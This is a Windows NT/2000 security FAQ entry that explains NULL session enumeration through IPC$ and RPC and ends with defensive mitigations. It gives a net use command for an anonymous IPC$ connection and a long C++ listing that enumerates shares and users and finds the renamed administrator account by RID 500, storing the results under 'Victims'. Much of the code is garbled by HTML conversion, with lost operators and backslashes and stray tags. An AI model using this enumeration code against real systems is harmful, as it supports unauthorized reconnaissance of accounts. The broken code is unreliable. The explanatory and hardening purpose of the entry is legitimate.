How is information enumerated through NULL session access, Remote Procedure Calls and IPC$?

A. A NULL session connection is an unauthenticated connection to an NT/W2000machine. Gaining NULL session access to an NTW2000 system is the number one method for hackers to enumerating information about an NTW2000 machine. 
From a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provideinformation on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalatingprivileges and perform DoS attacks.

See the below table for TCP/UDP ports and their use within NTW2000.

Keyword Decimal Description
---------------------------------------------------------------
loc-srv 135/tcp Location Service (RPC endpoint mapping)
loc-srv 135/udp Location Service (RPC endpoint mapping)
netbios-ns 137/tcp NETBIOS Name Service
netbios-ns 137/udp NETBIOS Name Service
netbios-dgm 138/tcp NETBIOS Datagram Service
netbios-dgm 138/udp NETBIOS Datagram Service
netbios-ssn 139/tcp NETBIOS Session Service
netbios-ssn 139/udp NETBIOS Session Service

For more information on port usage, see RFC1001, RFC1002

The above ports are often found open on a standard NTW2000 installation. A null session can only be made to TCP port 139, but the above other ports areoften required for code to be called effectively. Port 135 for example is used for RPC endpoint mapping.

From a hackers point of view when thinking about written code to enumerate this information;Exactly what can be called is hard to know, except for the things that are already known. There is little documentation available outside of Microsoftthat describes the different calls available after a null session has been established. The only thing hackers can do is try whatever they can think ofand see what happens, then try to understand why it works the way it does.

There could be things nobody outside Microsoft knows of yet. A lot of what is known though is wrote into tools to enumerate this information, toolssuch as penetration scanners, DumpACL, epdump, Getmac and even net view use these techniques. This is the only way currently coded into NT/Windows2000 to gather such information remotely. These tools are unfortunately a doubled edged sword, a balance between usability and security. Windows 2000uses this same method for information enumeration so the same problems/usability will persist.

What this does tell us though is that these NULL sessions, RPC etc should not be allowed on public networks or even private networks on some occasionsif security is of concern. This type of access requires the use of session layer protocols Server Message Block (SMB) and NetBIOS that provide I higherlayer functionality to that of simply TCP/UDP/IP. The TCP/IP connection to port 139 is made, then the session layer protocols SMB and NetBIOS are usedto access the NT hidden share IPC$. From the NT command line this can be performed with the following: net use \127.0.0.1ipc$ ""/user:"" This technique was programmatically written into an old exploit called theRedbutton attack.

From this NULL session connection all the above mentioned tools can be used and standard Microsoft APIs called. For example the WIN32 functions,LookupAccountName and LookupAccountSid, which reveal the SID or RID to account name and account name to SID or RID. Examples of these functionsbeing called can be seen in user2sid.exe and sid2user.exe developed by Evgenii Borisovich Rudnyi.

What is shown below is a programmatic connection to an NTW2000 machines via NULL sessions that then enumerates the true administrator account. This isachieved by using APIs to scan for the SID with the value 500, which is always the Administrator account renamed or otherwise. The following codesegment was supplied by JD Glaser from NT OBJECTives, Inc which is an excellent site for NT tools which demonstrate this same level of remoteaccess (http://www.ntobjectives.com/).

Follow the comments to see exactly where the APIs are used to enumerate the relevant information;

First - making a NULL Session connection

One way to this is by using the Net Use command with an empty password. 
Programmatically, it looks like this:

//This function called from dialog that fills listbox with connections

BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
//Setup for UNICODE
char* pTemp = TargetHost.GetBuffer(256);
WCHAR wszServ[256];
LPWSTR Server = NULL;

//Convert to Unicode
MultiByteToWideChar(CP_ACP, 0, pTemp,
strlen(pTemp)+1, wszServ,
sizeof(wszServ)/sizeof(wszServ[0]) );


//Create the IPC$ share connection string we need
Server = wszServ;

LPCWSTR szIpc = L"\IPC$";
WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + IPC$ + NULL
DWORD dwServNameLen;
DWORD dwRC;


//Setup Win32 structures and variables we need

NET_API_STATUS nas;

USE_INFO_2 ui2;
SHARE_INFO_1* pSHInfo1 = NULL;
DWORD dwEntriesRead;
DWORD dwTotalEntries;


//Set up handles to tree control to insert connection results

HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;

char sharename[256];
char remark[256];

if(Server

NULL || *Server

L'')
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}

dwServNameLen = lstrlenW( Server );

//Test for various errors in connection string and recover

if(Server[0] != L'\' && Server[1] != L'\')
{
// prepend slashes and NULL terminate
RemoteResource[0] = L'\';
RemoteResource[1] = L'\';
RemoteResource[2] = L'';
}
else
{
dwServNameLen -= 2; // drop slashes from count
RemoteResource[0] = L'';
}

if(dwServNameLen > CNLEN)
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}

if(lstrcatW(RemoteResource, Server)<p>NULL) return FALSE;<br>if(lstrcatW(RemoteResource, szIpc)</p>NULL) return FALSE;

//Start with clean memory

ZeroMemory(&ui2, sizeof(ui2));

//Fill in the Win32 network structure we need to use connect API

ui2.ui2_local = NULL;
ui2.ui2_remote = (LPTSTR) RemoteResource;
ui2.ui2_asg_type = USE_IPC;
ui2.ui2_password = (LPTSTR) L"";

//SET PASSWORD TO NULL

ui2.ui2_username = (LPTSTR) L"";
ui2.ui2_domainname = (LPTSTR) L"";

//MAKE THE NULL SESSION CALL

nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);

dwRC = GetLastError();
if( nas<p>NERR_Success )<br>{<br>machineRoot = pDlg-&gt;m_Victims.InsertItem(TargetHost, 0, 0,&nbsp;<br><br>TVI_ROOT);<br>}<br><br><br></p>

//THIS IS WHERE NT HANDS OUT IT INFORMATION

nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
MAX_PREFERRED_LENGTH,
&dwEntriesRead,
&dwTotalEntries, NULL);

dwRC = GetLastError();
if( nas<p></p>NERR_Success )
{
if(dwTotalEntries > 0)
{
shareRoot = pDlg->m_Victims.InsertItem("Shares", 
machineRoot,TVI_LAST);
userRoot = pDlg->m_Victims.InsertItem("Users", 
machineRoot,TVI_LAST);
adminRoot = pDlg->m_Victims.InsertItem("Admin", 
machineRoot,TVI_LAST);

}
for(int x=0; x<(int)dwTotalEntries; x++)
{

// Convert back to ANSI

WideCharToMultiByte(CP_ACP, 0, (const unsigned 
short*)pSHInfo1->shi1_netname, -1,
sharename, 256, NULL, NULL 
);

WideCharToMultiByte( CP_ACP, 0, (const unsigned 
short*)pSHInfo1->shi1_remark, -1,
remark, 256, NULL, NULL );
CString ShareDetails = sharename;
ShareDetails = ShareDetails + " - " + remark;

//fill the tree with connect info

attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, 
shareRoot,TVI_LAST);
pSHInfo1++;
}
}

//My Wrapper function for listing users - see below

DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

//WE ARE DONE, SO KILL THE CONNECTION

nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

TargetHost.ReleaseBuffer();
SetLastError( nas );
return FALSE;
}

The following function is how one can programmatically determine the 
administrator status of an account......

bool GetAdmin(char* pServer, char* pUser, CString& Name)
{
BOOL fAdmin = FALSE;
DWORD dwDomainName,dwSize,dwAdminVal;
SID_NAME_USE use;
PSID pUserSID = NULL; // SID for user
int rc;
int iSubCount;

bool bFoundHim = 0;
dwDomainName = 256;
dwSize = 0;
dwAdminVal = 0;
iSubCount = 0;

//Call API for buffer size since we don't know size beforehand

rc = LookupAccountName(pServer,
pUser, pUserSID,
&dwSize, szDomainName,
&dwDomainName, &use );
rc = GetLastError();

//Allocate a larger buffer

if(rc<p>ERROR_INSUFFICIENT_BUFFER)<br>{<br>pUserSID = (PSID) malloc(dwSize);<br><br></p>

//Repeat call now that we have the right size buffer

rc = LookupAccountName(pServer,
pUser, pUserSID,
&dwSize, szDomainName,
&dwDomainName, &use );
}

//Scan the SIDS for the golden key - ADMIN

500

//Get a count of SID's

iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

//Admin SID is the last element in the count

dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));

if(dwAdminVal
<p>500)</p>

//TEST TO SEE IF THIS IS THE ADMIN

{
Name.Format("Admin is %s\%s", szDomainName, pUser);
bFoundHim = true;
}

delete pUserSID;
return bFoundHim;

//WE KNOW WHO HE IS, ADD HIM TO THE TREE
}



Wrapper for Listing the user accounts.....

void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, 
HTREEITEM userRoot, HTREEITEM adminRoot)
{
USER_INFO_10 *pUserbuf, *pCurUser;
DWORD dwRead, dwRemaining, dwResume, dwRC;

char userName[256];
char userServer[256];

dwResume = 0;

if(pServer[0] != L'\' && pServer[1] != L'\')
{

//Start sting with correct UNC slashes and NULL terminate

RemoteResource[0] = L'\';
RemoteResource[1] = L'\';
RemoteResource[2] = L'';
}
else
{
dwServNameLen -= 2;

// drop slashes from count

RemoteResource[0] = L'';
}

if(dwServNameLen > CNLEN)
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return;
}

if(lstrcatW(RemoteResource, pServer)<p></p>NULL) return;

do
{

pUserbuf = NULL;

//THIS IS THE API THE NT USES TO HAND OUT IT's LIST

dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) 
&pUserbuf, 1024,
&dwRead, &dwRemaining, &dwResume);
if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
break;

DWORD i;
for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)
{

// Convert back to ANSI.

WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, 
-1, userName, 256, NULL, NULL );
<p></p>

// Convert back to ANSI.

<p><br></p><p>WideCharToMultiByte( CP_ACP, 0, pServer, -1,</p><p><br></p><p>userServer, 256, NULL, NULL );</p><p><br></p><p><br></p><p>if(!GotAdmin)</p><p><br></p><p>{</p><p><br></p><p>//use char strings</p><p><br></p><p>CString Admin;</p><p><br></p><p>GotAdmin = GetAdmin(userServer, userName, Admin);</p><p><br></p><p>if(GotAdmin)</p><p><br></p><p>{<br>Admin.TrimRight();<br>HTREEITEM adminChild = pDlg-&gt;m_Victims.InsertItem(Admin,&nbsp;<br>adminRoot, TVI_LAST);<br>pDlg-&gt;m_Victims.EnsureVisible(adminChild);<br>}<br>}<br><br>CString strUserName = userName;<br>pDlg-&gt;m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);<br><br>}<br>if (pUserbuf != NULL)<br>NetApiBufferFree(pUserbuf);<br>} while (dwRC == ERROR_MORE_DATA);<br><br>if (dwRC != ERROR_SUCCESS)<br>printf("NUE() returned %lu", dwRC);<br>}<br><br></p>

So what can be done to stop all this?

Several things can be done but in doing them you will reduce the functionality of your NTW2000 machine. A balance between usability/functionality and security needs to be found.

1. See Q. How can I restrict access to objects from Anonymous accounts?

Please read MSKB Q143474 to understand the effect this has.
Strangely NULL sessions can still be made, but the information that is available is restricted. For example sid2user will still function even withRestrictAnonymous set.
See http://geek-girl.com/bugtraq/1997_2/0079.html for the original exploit.
This registry setting is automatically created within Windows 2000 but is set to (0) disabled.

2. Removing the 'Workstation' and 'Server' service. This removes the ability of the NTW2000 machine to respond to client or server requests.

3. Disabling NetBIOS through the registry and or removing the 'NetBIOS Interface' service. This removes the session layer protocol NetBIOS whichis required for file sharing (IPC$).

Remember you must understand the functionality that this will reduce from making any of these changes. For example the above level of change(s) maynot be desirable for a workstation but would be for a web server.

Things are changing with Windows 2000, as NetBIOS is not actually required anymore in a native Windows 2000 environment. Windows 2000 also reduces theavailable APIs that can be called, for example the 'reg' calls are greatly reduced. So no longer can registry permissions be enumerated in Windows2000 like they could within NT. Most of the other calls are still available in W2000 like SID information and the file ACLs all via the NULL session.

There are also other methods for preventing NULL session other than the ones described above. These are possibly the most effect on an NTW2000 O/S level though. See http://www.stationx.net/ntsecurity/ for more information. On a network level the TCP/UDP ports 135-139 detailed above would be blocked using firewall(s) and or filtering router(s) from public access.

Contributed by Nathan House